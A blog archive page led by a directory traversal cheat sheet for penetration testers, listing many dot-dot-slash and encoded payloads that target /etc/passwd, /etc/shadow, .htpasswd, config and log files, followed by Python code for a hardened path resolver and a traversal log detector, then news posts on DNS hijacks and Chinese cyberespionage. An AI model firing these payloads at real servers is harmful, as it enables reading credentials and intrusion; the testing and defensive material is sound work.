Showing posts with label Chinese cyberspies. Show all posts

Monday, 25 May 2015

Directory Traversal Attack Cheat Sheet for Application Penetration Test


Are attackers dot-dot-slashing their way into your data?
About as simple to fix as they are to exploit, directory traversal vulnerabilities remain a persistent threat in the application environment. Yet many developers, and even security teams, are unaware that such a flaw can let attackers learn how a system is organized, read sensitive files on the application server, or use that access as an easy starting point for further attacks on the server or the rest of the network.

According to Imperva's most recent "Web Application Attack Report," released last month, directory traversal accounted for 31 percent of attacks on retail Web applications among the eight most prevalent attack types, and for 36 percent of attacks against Web apps in all other industries. In retail, that figure lagged behind a whopping 53 percent for SQL injection, but in other verticals it even led SQLi, which accounted for only 27 percent of attacks. Meanwhile, secure hosting firm FireHost reported last month in its Superfecta statistics, which cover the four major attack types it commonly blocks -- XSS, directory traversal, cross-site request forgery, and SQL injection -- that directory traversal ranked second behind XSS, making up 23 percent of the 9.8 million attacks in those four categories blocked by its IP Reputation Management system.

Here I have attached the most important Directory Traversal Attack Cheat Sheet for info-sec auditors and developers.

/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\.....\\\.....\\\.....\\\
= "/.." . "%2f.."
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
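The fix the post opens with ("about as simple to fix as they are to exploit"), in working code. This is an added example and not part of the original cheat sheet: it puts a naive file resolver that joins the request onto the web root next to a hardened one that canonicalizes the path and checks containment, and it runs a small detector over access-log lines. The web root, the file it holds, and the log lines are constructed for the example; the request strings fed to it are payloads from the list above.

```python
"""Directory traversal: a naive file resolver beside a hardened one, plus a
detector run over access-log lines.  Added example, not code from the original
post; the web root, file contents and log lines are constructed for
illustration, and the request strings are payloads from the list above."""
import os
import re
import tempfile
from urllib.parse import unquote


def make_webroot():
    """Create a throwaway web root holding one public file (constructed)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<h1>public</h1>\n")
    return root


def is_inside(base, path):
    """True when the canonical form of `path` is `base` itself or lies below it.
    realpath folds '.' and '..' segments and follows symlinks, so the comparison
    is made on the path the filesystem would actually open."""
    base = os.path.realpath(base)
    path = os.path.realpath(path)
    return path == base or path.startswith(base + os.sep)


def resolve_naive(root, requested):
    """The bug: decode once, join onto the root and trust the result.
    '../' segments in the request walk straight out of the web root."""
    return os.path.join(root, unquote(requested))


def resolve_safe(root, requested):
    """Hardened resolver.  Decode exactly once (the server does the same),
    reject NUL and backslash characters outright, treat every request as
    relative to the root by dropping a leading slash, canonicalize, and only
    then require the result to stay inside the canonical root.
    Returns the canonical path, or None when the request is rejected."""
    decoded = unquote(requested)
    if "\x00" in decoded or "\\" in decoded:
        return None
    candidate = os.path.join(root, decoded.lstrip("/"))
    if not is_inside(root, candidate):
        return None
    return os.path.realpath(candidate)


def serve(root, requested):
    """Return the file body for an accepted request, else None (403/404)."""
    path = resolve_safe(root, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()


# Constructed common-log-format access-log lines: lines 2 and 3 carry
# payloads from the cheat sheet, lines 1 and 4 are ordinary requests.
SAMPLE_LOG = """\
203.0.113.5 - - [25/May/2015:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [25/May/2015:10:00:02 +0000] "GET /download?file=../../../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.5 - - [25/May/2015:10:00:03 +0000] "GET /download?file=..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow HTTP/1.1" 403 0
203.0.113.5 - - [25/May/2015:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 77
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# A '..' segment delimited by a path separator or a query delimiter.
DOTDOT_RE = re.compile(r"(^|[\\/?=&])\.\.([\\/]|$)")


def traversal_hits(log_text):
    """Return (line_number, decoded_request) for each access-log line whose
    request target, after one round of percent-decoding, contains a '..'
    segment.  Decoding first is what makes the %2F and %5c forms visible;
    treat the output as triage input, not proof of compromise."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = unquote(match.group(1))
        if DOTDOT_RE.search(target):
            hits.append((lineno, target))
    return hits


if __name__ == "__main__":
    root = make_webroot()
    print("hardened serves index:", serve(root, "/index.html"))
    print("hardened rejects traversal:", resolve_safe(root, "..%2F..%2F..%2Fetc%2Fpasswd"))
    for lineno, target in traversal_hits(SAMPLE_LOG):
        print(f"log line {lineno}: {target}")
```

The resolver's check compares canonical paths rather than searching the request for dot-dot sequences, so it does not depend on enumerating every encoding in the list above: whatever the request looks like, the question is only whether the path the filesystem would open lies under the web root. The log detector is the opposite kind of tool, a string heuristic for triage, and the status code on each flagged line (200 versus 403) is what tells a responder whether the read actually succeeded.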

Wednesday, 28 August 2013

How Twitter Dodged Website Attack That Took Down New York Times

Chalk one up for Twitter Inc.
While the New York Times and Google Inc. (GOOG:US) had visitors to their sites redirected this week by hackers, the microblogging service was better able to deflect attacks because of a simple tool called a registry lock. Like alerts sent to credit-card users when something bad happens, the feature notifies website managers of attempts by intruders to tamper with critical information, such as Web-address data.
The cost? As little as $50 a year.
Large banks, e-commerce companies, gambling sites and pornographers have used registry locks from VeriSign Inc. (VRSN:US) and NeuStar Inc. (NSR:US) to prevent unauthorized changes. Attacks by the Syrian Electronic Army routed New York Times readers to a site that displayed the group’s initials and altered some registration data. They underscore how vulnerable many companies are to relatively unsophisticated attacks, which can take down sites and harm their businesses.
“This is certainly an ah-ha moment,” said Rodney Joffe, a senior technologist at NeuStar. The Sterling, Virginia-based company began offering registry locks in 2010 and requires that website domain information be accompanied by two layers of verification, such as additional codes from security tokens.
“It is a niche business but there’s no reason for it to be,” he said. “It’s the kind of thing you have to do today.”
While Twitter’s site operated normally, twitter.co.uk was inaccessible for some users. The Syrian Electronic Army, which backs the country’s president, Bashar al-Assad, claimed responsibility for the New York Times and Twitter intrusions, as well as the Washington Post this month and the Financial Times in early May. Unknown hackers altered Google’s website in the Palestinian territories, displaying a map without Israel.

Raising Bar

The attacks exploited weaknesses in a registration network called the Domain Name System, exposing risks that site operators face because they’re relying on third parties to handle their online addresses. Weaknesses in DNS, which was created in the 1980s to help computers find websites using names instead of numbers, haven’t been seen as a significant threat outside of the financial-services and retail sectors up to now, according to John Pescatore, director of emerging-security trends at the SANS Institute in Stamford, Connecticut.
“There are still a lot of sloppy practices,” Pescatore said. “There’s a lot of room to raise the bar.”
Because Twitter, based in San Francisco, monitors its DNS information in real time and had implemented a registry lock, it was better prepared than the New York Times, according to HD Moore, chief research officer at Rapid7, a Boston-based security firm. Since the attacks, many other companies have moved to institute similar safeguards, he said.

DNS Flaw

Twitter has had its DNS records hacked before. The company acknowledged in 2009 that its DNS records were compromised by hackers who defaced the site with a message about Iran. Jim Prosser, a spokesman for Twitter, declined to comment on the company’s security measures.
A vast system that underpins how computers locate each other, DNS is often called the phone book of the Internet. In 2008, Dan Kaminsky, a security researcher, uncovered a flaw in the system that would let hackers easily impersonate legitimate sites. He worked with technology companies to fix it. The finding prompted several companies that process financial transactions online to adopt additional security measures to ensure their domain information is secure, while others stayed on the sidelines, according to SANS’s Pescatore.

Security Steps

NeuStar and VeriSign, another provider of registry lock services, declined to identify the companies using their registry lock services. Danny McPherson, chief security officer of VeriSign, said in a statement that the technology gives customers more control over who can change information.
Eileen Murphy, a spokeswoman for the New York Times (NYT:US) Co., said the newspaper is looking at additional measures.
“In light of this attack and the apparent vulnerability even at what had been highly secure registrars, we are tightening all of our security,” she said.
Jay Nancarrow, a spokesman for Google, declined to comment on the company’s security. The company’s Palestine site itself wasn’t hacked, and Google is talking with the domain manager to resolve the issue, he said.
One complication of hosting sites with addresses of specific countries or regions is that many of the registration providers don’t use registry locks and other protective steps, said Paco Hope, a principal consultant with Cigital Inc.
“When you’re a company like the New York Times or Twitter or Google, your stock in trade is the Internet, it’s the service you offer, and that’s why it makes sense to put in a lot more security,” Hope said.
The rise in sophisticated hacking attacks is helping fuel a market for computer-security technology that is expected to exceed $65.7 billion this year, according to Gartner Inc.
Many companies that didn’t prioritize a threat involving their DNS records are now rethinking that approach, SANS’s Pescatore said.
“It’s one of several Achilles’ heels of using the Internet,

Lack of Details on China Hacking Claim Puzzles Analysts


[Photo: A netizen in Leping, Jiangxi province uses a smartphone to browse the China Internet Network Information Center (CNNIC) website, July 17, 2013. Credit: ImagineChina]
A recent cyberattack on China's country-level .cn domain may not be all that it seems, computer experts said this week.

Beijing's China Internet Network Information Center (CNNIC), which maintains the registry for the top-level domain, announced this week that it was crippled by two distributed denial of service (DDoS) attacks on websites using the .cn suffix in the early hours of Sunday morning.

The first started around midnight Beijing time, and service was restored by around 2:00 p.m. local time, CNNIC said in a statement.

The second, which hit at around 4:00 p.m. local time, was the largest ever DDoS attack to hit China's Internet.

Many websites were rendered completely inaccessible or extremely slow to load for an unspecified period of time, it said.

Beijing's Ministry of Industry and Information Technology, which oversees CNNIC, has launched "specific contingency plans" to protect national domain name resolution services.

But no details of the attack or the contingency plans were made public, leading cybersecurity experts to question the point of the announcement.

Call for details

Rutgers University computer scientist Zhou Shiyu called on Beijing to make detailed information about the attack public.

"The problem is that there's no evidence that indicates whether this attack came from within China or from overseas," Zhou said. "They must explain this clearly."

"All we know is that [DDoS] attacks are the commonest method of attack," he said.

He added that China was no stranger to carrying out large-scale cyberattacks itself.

"The Chinese government has spent huge amounts of money and resources on developing its ability to carry out online attacks," he said.

Smokescreen attack?

Meanwhile, U.S.-based Internet security analyst Li Hongkuan said the likelihood of Chinese government-backed attacks against the .cn domain existed, but wasn't large.

Beijing could even have staged the attacks as a smokescreen, given that its standard response to allegations of government-backed cyberattacks overseas is that it, too, is the target of such attacks.

"It's quite possible that the Chinese government is a thief crying 'thief,' or that it's bluffing," Li said.

"It's also possible that these attacks came from hackers within China who are critical of the government."

For the time being, CNNIC has apologized for the disruption and promised that more details will be made public as soon as they are discovered.

Mandiant

China has rejected claims that its People's Liberation Army (PLA) was behind a series of hacker attacks on U.S. corporate networks described in a February report by the security firm Mandiant.

Beijing's Ministry of National Defense denied claims made in a 74-page report by U.S.-based Mandiant which said it had traced a large number of transnational cyberattacks to IP addresses assigned to a building it said belonged to the PLA in Shanghai.

Mandiant said the building was the home of the PLA's cyberespionage "Unit 61398," which it said had stolen data, including intellectual property, from at least 141 companies since 2006.

Mandiant's report said it was "highly unlikely" the Chinese government was unaware of the hacking attacks, and was possibly supporting the cyberespionage.

New York Times

In the same month, The New York Times newspaper accused hackers traced to China of "persistently" infiltrating its computer networks over the last four months, also sparking an angry denial from Beijing.

The paper had hired a team of computer security experts to trace the attacks and block any back doors through which they were gaining access to the system, it said.

Cybersecurity experts said the report should be taken in the context of widespread cyberespionage carried out by a large number of countries.

Thursday, 4 July 2013

Confidential report lists U.S. weapons system designs compromised by Chinese cyberspies

Designs for many of the nation’s most sensitive advanced weapons systems have been compromised by Chinese hackers, according to a report prepared for the Pentagon and to officials from government and the defense industry.
Among more than two dozen major weapons systems whose designs were breached were programs critical to U.S. missile defenses and combat aircraft and ships, according to a previously undisclosed section of a confidential report prepared for Pentagon leaders by the Defense Science Board.
Experts warn that the electronic intrusions gave China access to advanced technology that could accelerate the development of its weapons systems and weaken the U.S. military advantage in a future conflict.
The Defense Science Board, a senior advisory group made up of government and civilian experts, did not accuse the Chinese of stealing the designs. But senior military and industry officials with knowledge of the breaches said the vast majority were part of a widening Chinese campaign of espionage against U.S. defense contractors and government agencies.
The significance and extent of the targets help explain why the Obama administration has escalated its warnings to the Chinese government to stop what Washington sees as rampant cybertheft.
In January, the advisory panel warned in the public version of its report that the Pentagon is unprepared to counter a full-scale cyber-conflict. The list of compromised weapons designs is contained in a confidential version, and it was provided to The Washington Post.
Some of the weapons form the backbone of the Pentagon’s regional missile defense for Asia, Europe and the Persian Gulf. The designs included those for the advanced Patriot missile system, known as PAC-3; an Army system for shooting down ballistic missiles, known as the Terminal High Altitude Area Defense, or THAAD; and the Navy’s Aegis ballistic-missile defense system.
Also identified in the report are vital combat aircraft and ships, including the F/A-18 fighter jet, the V-22 Osprey, the Black Hawk helicopter and the Navy’s new Littoral Combat Ship, which is designed to patrol waters close to shore.
Also on the list is the most expensive weapons system ever built — the F-35 Joint Strike Fighter, which is on track to cost about $1.4 trillion. The 2007 hack of that project was reported previously.
China, which is pursuing a comprehensive long-term strategy to modernize its military, is investing in ways to overcome the U.S. military advantage — and cyber-espionage is seen as a key tool in that effort, the Pentagon noted this month in a report to Congress on China. For the first time, the Pentagon specifically named the Chinese government and military as the culprit behind intrusions into government and other computer systems.
As the threat from Chinese cyber-espionage has grown, the administration has become more public with its concerns. In a speech in March, Thomas Donilon, the national security adviser to President Obama, urged China to control its cyber-activity. In its public criticism, the administration has avoided identifying the specific targets of hacking.
But U.S. officials said several examples were raised privately with senior Chinese government representatives in a four-hour meeting a year ago. The officials, who spoke on the condition of anonymity to describe a closed meeting, said senior U.S. defense and diplomatic officials presented the Chinese with case studies detailing the evidence of major intrusions into U.S. companies, including defense contractors.
In addition, a recent classified National Intelligence Estimate on economic cyber-espionage concluded that China was by far the most active country in stealing intellectual property from U.S. companies.
The Chinese government insists that it does not conduct cyber-espionage on U.S. agencies or companies, and government spokesmen often complain that Beijing is a victim of U.S. cyberattacks.
Obama is expected to raise the issue when he meets with Chinese President Xi Jinping next month in California.
A spokesman for the Pentagon declined to discuss the list from the science board’s report. But the spokesman, who was not authorized to speak on the record, said in an e-mail, “The Department of Defense has growing concerns about the global threat to economic and national security from persistent cyber-intrusions aimed at the theft of intellectual property, trade secrets and commercial data, which threatens the competitive edge of U.S. businesses like those in the Defense Industrial Base.”
The confidential list of compromised weapons system designs and technologies represents the clearest look at what the Chinese are suspected of targeting. When the list was read to independent defense experts, they said they were shocked by the extent of the cyber-espionage and the potential for compromising U.S. defenses.